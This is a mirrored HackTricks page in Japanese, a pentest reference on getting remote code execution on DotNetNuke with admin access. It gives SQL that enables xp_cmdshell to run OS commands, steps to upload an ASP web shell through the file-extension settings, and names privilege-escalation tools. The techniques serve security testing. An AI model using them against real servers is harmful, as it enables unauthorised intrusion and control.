mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
4.9 KiB
4.9 KiB
DotNetNuke (DNN)
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- **ハッキングのトリックを共有するには、hacktricks repoとhacktricks-cloud repo**にPRを提出してください。
DotNetNuke (DNN)
DNNに管理者としてログインすると、RCEを簡単に取得できます。
RCE
SQL経由
設定
ページの下にあるSQLコンソールから、xp_cmdshell
を有効にしてオペレーティングシステムコマンドを実行できます。
次の行を使用して**xp_cmdshell
**を有効にします:
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
そして、"スクリプトを実行" を押して、そのSQL文を実行します。
次に、以下のようなものを使用してOSコマンドを実行します:
xp_cmdshell 'whoami'
ASPウェブシェルを介して
設定 -> セキュリティ -> その他 -> その他のセキュリティ設定
で、許可されるファイル拡張子
の下に新しい許可される拡張子を追加し、保存
ボタンをクリックします。
asp
またはaspx
を追加し、その後、/admin/file-management
にaspウェブシェルをアップロードします(例:shell.asp
)。
その後、**/Portals/0/shell.asp
**にアクセスしてウェブシェルにアクセスします。
特権昇格
例えば、PotatoesまたはPrintSpooferを使用して特権を昇格させることができます。
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンやHackTricksのPDFをダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
- The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
- 公式のPEASS&HackTricksのグッズを手に入れましょう。
- 💬 DiscordグループまたはTelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
- ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリにPRを提出してください。